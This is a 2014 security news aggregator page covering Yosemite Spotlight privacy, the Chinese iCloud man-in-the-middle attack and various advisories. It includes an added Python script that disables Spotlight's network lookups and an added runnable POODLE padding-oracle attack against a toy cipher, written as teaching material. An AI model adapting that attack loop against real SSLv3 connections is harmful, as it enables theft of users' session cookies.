Hackin9

Two steps toward privacy, one step back.

While privacy advocates lauded Apple for defaulting to encrypted storage on its latest mobile operating system, iOS 8, the company faced criticism on Monday after independent researchers found that its latest desktop release, Mac OS X Yosemite, is configured out of the box to send the user's location and search terms to Apple whenever a user types a query into Spotlight.

Spotlight is the company's search feature for Mac OS X. It doesn't just search the user's computer, though: by default it also forwards the query to Apple (for Spotlight Suggestions) and to Microsoft's Bing (for web results) so that hits from those services appear alongside local ones, according to Fix-MacOSX.com.
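Before accepting a vendor default like this, audit it. What follows is an added example (my code, not the Fix-MacOSX.com script and not anything from Apple) that reads a com.apple.Spotlight preference plist, reports which of the two network-lookup entries are switched on, and rewrites the plist with them off while leaving the local-only categories untouched. The key names `orderedItems`, `MENU_SPOTLIGHT_SUGGESTIONS` and `MENU_WEBSEARCH` are my recollection of Yosemite's Spotlight preferences rather than something stated on this page, and the sample plist is constructed; confirm the names on your own machine with `defaults read com.apple.Spotlight orderedItems` before applying anything.

```python
"""Audit a com.apple.Spotlight preference plist for the entries that make Spotlight
contact Apple and Bing, and turn them off. Added example; key names are assumed
from Yosemite's preferences, not taken from the page above."""
import plistlib
import sys

# The two orderedItems entries that trigger network lookups (assumed names;
# confirm with `defaults read com.apple.Spotlight orderedItems`).
NETWORK_ITEMS = {"MENU_SPOTLIGHT_SUGGESTIONS", "MENU_WEBSEARCH"}

# Constructed sample in the shape of the real plist, trimmed to four entries.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>orderedItems</key>
  <array>
    <dict><key>enabled</key><true/><key>name</key><string>APPLICATIONS</string></dict>
    <dict><key>enabled</key><true/><key>name</key><string>MENU_SPOTLIGHT_SUGGESTIONS</string></dict>
    <dict><key>enabled</key><true/><key>name</key><string>MENU_WEBSEARCH</string></dict>
    <dict><key>enabled</key><true/><key>name</key><string>DOCUMENTS</string></dict>
  </array>
</dict>
</plist>
"""


def enabled_flags(plist_bytes):
    """[(name, enabled), ...] in menu order, handy for a before/after comparison."""
    prefs = plistlib.loads(plist_bytes)
    return [(item["name"], bool(item.get("enabled", False)))
            for item in prefs.get("orderedItems", [])]


def leaking_items(plist_bytes):
    """Names of the network-lookup entries that are currently enabled."""
    return [name for name, on in enabled_flags(plist_bytes) if on and name in NETWORK_ITEMS]


def disable_network_items(plist_bytes):
    """Return (rewritten plist bytes, names switched off). Local categories keep their state."""
    prefs = plistlib.loads(plist_bytes)
    changed = []
    for item in prefs.get("orderedItems", []):
        if item.get("name") in NETWORK_ITEMS and item.get("enabled", False):
            item["enabled"] = False
            changed.append(item["name"])
    return plistlib.dumps(prefs), changed


if __name__ == "__main__":
    # Usage: python spotlight_audit.py [exported.plist] > fixed.plist
    src = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PLIST
    fixed, changed = disable_network_items(src)
    print("disabled:", changed, file=sys.stderr)
    sys.stdout.buffer.write(fixed)
```

On a Mac you would export the live preferences with `defaults export com.apple.Spotlight spotlight.plist`, run the script over that file, and import the result back with `defaults import com.apple.Spotlight spotlight.plist`. Safari keeps its own "Include Spotlight Suggestions" switch under its Search preferences; that one is separate and is not touched here.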


 
A screen capture shows the warning of a fake iCloud.com certificate—signed by an official Chinese certificate authority.

GreatFire.org, a group that monitors censorship by the Chinese government’s national firewall system (often referred to as the “Great Firewall”), reports that China is using the system as part of a man-in-the-middle (MITM) attack on users of Apple’s iCloud service within the country. The attacks come as Apple begins the official rollout of the iPhone 6 and 6 Plus on the Chinese mainland.

The attack, which pairs a forged certificate with a spoofed Domain Name System (DNS) address for the iCloud service, is affecting users nationwide in China. The GreatFire.org team speculates that the attack is an effort to help the government get around the improved on-device security of the new phones by capturing users' iCloud credentials instead, which would give it access to cloud-stored content such as phone backups.

Chinese iCloud users who tried to log in with Firefox or Chrome would have been warned about the fraudulent certificate. Those using Mac OS X's built-in iCloud login or another browser may not have noticed the redirection, however, and their iCloud credentials would have been captured immediately. Two-step verification limits the damage: a captured password is not by itself enough to sign in, although an attacker already sitting in the connection path can still relay a one-time code while it is valid.


 
LiteCart Security Advisory - Multiple XSS Vulnerabilities - CVE-2014-7183
 
APPLE-SA-2014-10-20-2 Apple TV 7.0.1
 
APPLE-SA-2014-10-20-1 iOS 8.1
 
AST-2014-011: Asterisk Susceptibility to POODLE Vulnerability
 
[security bulletin] HPSBMU03126 rev.2 - HP Operations Manager/Operations Agent, Remote Cross-site Scripting (XSS)
 
[security bulletin] HPSBHF03146 rev.1 - HP Integrity SD2 CB900s i4 & i2 Server running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBHF03145 rev.1 - HP Integrity Superdome X and HP Converged System 900 for SAP HANA running Bash Shell, Remote Code Execution
 
GNOME gnome-shell Lock Screen Local Security Bypass Vulnerability
 
Linux Kernel VFS 'pivot_root()' Function Denial of Service Vulnerability
 
Linux Kernel CVE-2014-7975 Local Denial of Service Vulnerability
 
Zend Framework CVE-2014-8088 Authentication Bypass Vulnerability
 


Apple released security updates today for iOS 8 and Apple TV 7.

iOS 8.1 (APPLE-SA-2014-10-20-1 iOS 8.1) is now available for iPhone 4s and later, iPod touch (5th generation) and later, and iPad 2 and later, to address the following:

Bluetooth CVE-2014-4428
House Arrest CVE-2014-4448
iCloud Data Access CVE-2014-4449
Keyboards CVE-2014-4450
Secure Transport CVE-2014-3566

Apple TV 7.0.1 (APPLE-SA-2014-10-20-2 Apple TV 7.0.1) is now available for Apple TV 3rd generation and later, to address the following:

Bluetooth CVE-2014-4428
Secure Transport CVE-2014-3566

[1] https://support.apple.com/kb/HT1222

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

Teaching SEC 503 end of October in Ottawa

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
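CVE-2014-3566 appears three times on this page: the Asterisk POODLE advisory (AST-2014-011) and the Secure Transport entries in both Apple updates above. What those fixes address is the SSLv3 padding rule: the receiver of a CBC record checks only the final padding-length byte, so an attacker who can copy a chosen ciphertext block into the padding position learns one plaintext byte for every 256 records the server accepts or rejects, on average. The following added example (my code, not Apple's, Digium's or the ISC diary's) walks that attack end to end against a toy record layer. The block cipher is a disposable HMAC-SHA256 Feistel network standing in for a real 16-byte cipher; the keys, the cookie value and the request shape are constructed; the attacker is assumed to know the cookie's length and position, as in the real attack; and an `sslv3=False` switch makes the receiver check every padding byte the way TLS does, which is why the same loop stalls there.

```python
# Toy POODLE (CVE-2014-3566) walk-through. Added example: keys, secret and request
# shape are constructed, and the "block cipher" is a throwaway HMAC-based Feistel
# network standing in for a real 16-byte block cipher.
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size
MAC_LEN = 20  # SSLv3 MAC size with SHA-1

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    lh, rh = block[:8], block[8:]
    for rnd in range(4):
        lh, rh = rh, xor(lh, _f(key, rnd, rh))
    return lh + rh

def block_decrypt(key, block):
    lh, rh = block[:8], block[8:]
    for rnd in reversed(range(4)):
        lh, rh = xor(rh, _f(key, rnd, lh)), lh
    return lh + rh

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def seal_record(enc_key, mac_key, plaintext, sslv3=True):
    """Client side: MAC-then-pad-then-encrypt, returns iv || ciphertext. SSLv3 lets
    the padding filler be anything; TLS requires every filler byte to equal pad_len."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = (BLOCK - 1 - len(body)) % BLOCK  # a full padding block when body is aligned
    filler = os.urandom(pad_len) if sslv3 else bytes([pad_len]) * pad_len
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(enc_key, iv, body + filler + bytes([pad_len]))

def open_record(enc_key, mac_key, record, sslv3=True):
    """Server side; True means the record was accepted. That signal is the oracle."""
    pt = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if not sslv3 and any(b != pad_len for b in pt[-1 - pad_len:-1]):
        return False  # TLS rejects unless all filler bytes match
    body = pt[:len(pt) - pad_len - 1]  # SSLv3 trusts the length byte alone
    if len(body) < MAC_LEN:
        return False
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())

def poodle_recover(secret_len, send, oracle, max_tries=100_000):
    """send(path_len, body_len) -> a fresh record from the victim; oracle(record) -> bool.
    Per byte: choose lengths so the byte is last in its block and the record ends in a
    full padding block, then copy that block over the padding block and ask the server."""
    recovered = bytearray()
    for j in range(secret_len):
        path_len = (BLOCK - 1 - j) % BLOCK                       # byte j at a block end
        body_len = (-(path_len + secret_len + MAC_LEN)) % BLOCK  # data+MAC aligned
        t = (path_len + j) // BLOCK + 1                          # index into [iv, c1..cn]
        for _ in range(max_tries):
            rec = send(path_len, body_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            if oracle(b"".join(blocks[:-1]) + blocks[t]):
                # accepted => D(c_t) ^ c_{n-1} ends in BLOCK-1, and D(c_t) = p_t ^ c_{t-1}
                recovered.append((BLOCK - 1) ^ blocks[t - 1][-1] ^ blocks[-2][-1])
                break
        else:
            return None  # oracle never fired (expected with TLS-style checks)
    return bytes(recovered)

SECRET = b"session=4fd2a"  # constructed cookie value the attacker is after
ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(16)

def demo(sslv3=True, max_tries=100_000):
    # Attacker-run JavaScript fixes the path and body lengths; the browser puts the
    # cookie between them; the server's accept/reject answer completes the loop.
    send = lambda path_len, body_len: seal_record(
        ENC_KEY, MAC_KEY, b"/" * path_len + SECRET + b"x" * body_len, sslv3)
    oracle = lambda record: open_record(ENC_KEY, MAC_KEY, record, sslv3)
    return poodle_recover(len(SECRET), send, oracle, max_tries)

if __name__ == "__main__":
    print("SSLv3 padding:", demo(True))         # recovers SECRET, about 256 requests per byte
    print("TLS padding:  ", demo(False, 2000))  # None: strict padding check kills the oracle
```

The patch in Secure Transport, Asterisk and everywhere else is not a cleverer padding check but refusing SSLv3 altogether (or negotiating TLS_FALLBACK_SCSV so a downgrade cannot be forced); the TLS branch of `open_record` shows why the strict rule alone already removes the 1-in-256 signal the attack needs.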
 

Security in the cloud era, such as it is
FierceEnterpriseCommunications
And on-premise infosec teams find themselves acting as liaisons between their organizations and the tech support personnel for the antivirus vendors. Rather than security vendors informing them of the latest dangers, the tables have turned and the ...

 

SANS to Debut its Biggest NetWars CyberCity Challenge at CDI 2014
PR Newswire (press release)
BETHESDA, Md., Oct. 20, 2014 /PRNewswire-USNewswire/ -- SANS today announced the ultimate training event for cyber warriors and Infosec professionals as it brings together every CyberCity mission ever offered, and new missions, under one single ...

 
[security bulletin] HPSBST03129 rev.1 - HP StoreFabric B-series switches running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBST03131 rev.1 - HP StoreOnce Backup Systems running Bash Shell, Remote Code Execution
 
[security bulletin] HPSBMU03144 rev.1 - HP Operation Agent Virtual Appliance, Bash Shell, Remote Code Execution
 
[security bulletin] HPSBMU03143 rev.1 - HP Virtualization Performance Viewer, Bash Shell, Remote Code Execution
 

ISPs handbagged: BLOCK knock-off sites, rules beak
Register
Arnold had to balance the EU InfoSoc Directive, limiting liability for service providers, with the EU E-commerce Directive which protects trade. The latter applied to both sides in this case: giving traders the right to pursue injunctions, and service ...

 

 

To prevent breaches, change security hierarchy and use better metrics
TechTarget
Dr. Cole was the lone inductee into the InfoSec European Hall of Fame in 2014. He is actively involved with the SANS Technology Institute (STI) and is a SANS faculty senior fellow and course author who works with students, teaches, and develops and ...

 
Microsoft Windows FAT32 Disk Partition Driver CVE-2014-4115 Local Privilege Escalation Vulnerability
 
Microsoft .NET Framework 'iriParsing' Remote Code Execution Vulnerability
 
Microsoft .NET Framework ClickOnce CVE-2014-4073 Remote Privilege Escalation Vulnerability
 
Microsoft .NET Framework CVE-2014-4122 ASLR Security Bypass Vulnerability
 
[SECURITY] [DSA 3050-1] iceweasel security update
 
Re: LiveZilla 5.3.0.7 Security Issue
 
Elastix Multiple vulnerabilities (Remote Command Execution, XSS, CSRF)
 


 

Authentic8 Enhances Silo for Enterprise Information Security Researchers
Dark Reading
“These enhancements for infosec researchers are a direct response to the needs of our users. Silo is a platform and we will continue to enhance and extend its capabilities.” “Our team has been using Toolbox for a while. The ability to launch a browser ...

 

White Ops Names Former RSA CISO as President and Chief Operating Officer
Dark Reading
Eddie drove defensive strategies on the demand side of the cyber security technology market as the first CISO at Nationwide Insurance, during thirteen years of government service, and for years as technical director of a key government InfoSec lab.

 

Posted by InfoSec News on Oct 20

http://www.csoonline.com/article/2835215/data-protection/hackers-strike-defense-companies-through-realtime-ad-bidding.html

By Jeremy Kirk
IDG News Service
Oct 17, 2014

A major change this year in how online advertisements are sold has been
embraced by hackers, who are using advanced ad-targeting capabilities to
precisely deliver malware.

Security vendor Invincea said it has detected many instances of people
within defense and aerospace...
 

 

Posted by InfoSec News on Oct 20

http://www.usatoday.com/story/life/tv/2014/10/19/hackers-on-tv/17432191/

By Ann Oldenburg
USA TODAY
October 19, 2014

Hackers are hot.

Yes, they tend to be villains in real life, making headlines for tapping
into Target to steal credit card data, breaking into the cloud to snatch
nude celebrity photos, and even breaching government firewalls to commit
all sorts of top-level cybercrimes.

But on TV? They're the new heroes.

"Hackers...
 

Posted by InfoSec News on Oct 20

***************************************************************************
***BEGIN THOTCON TRANSMISSION**********************************************

[THOTCON ASCII-art banner]
 

Posted by InfoSec News on Oct 20

http://www.theregister.co.uk/2014/10/20/first_standards_to_clean_up_messy_certs/

By Darren Pauli
The Register
20 Oct 2014

The global gathering of incident responders FIRST is spearheading a global
standards effort to reform and unify the operations of government and
large enterprise computer emergency response teams (CERTs).

The Forum of Incident Response and Security Teams (FIRST) has tipped
US$500,000 into the effort and has received...
 

Posted by InfoSec News on Oct 20

http://www.china.org.cn/world/2014-10/20/content_33809960.htm

China Daily
October 20, 2014

Cyber security is an irritant to bilateral ties. On Wednesday the US
Federal Bureau of Investigation said hackers it believed were backed by
the Chinese government had launched more attacks on US companies, a charge
China rejected as unfounded.

In May, the United States charged five Chinese military officers with
hacking American firms, prompting...
 
Libxml2 Entities Expansion CVE-2014-3660 Denial of Service Vulnerability
 
Linux Kernel 'netdevice.h' NULL Pointer Dereference Denial of Service Vulnerability
 

SANS to Offer Training in Advanced Penetration Testing and Exploit Writing in ...
IT Business Net
DUBAI, United Arab Emirates, 19th October, 2014: SANS Gulf Region 2014, the region's largest InfoSec training event will be offering SANS' SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course as part of a quartet of 6-day ...

 
Mozilla Firefox/Thunderbird CVE-2014-1585 Security Bypass Vulnerability
 
Mozilla Firefox/Thunderbird CVE-2014-1586 Security Bypass Vulnerability
 

 
 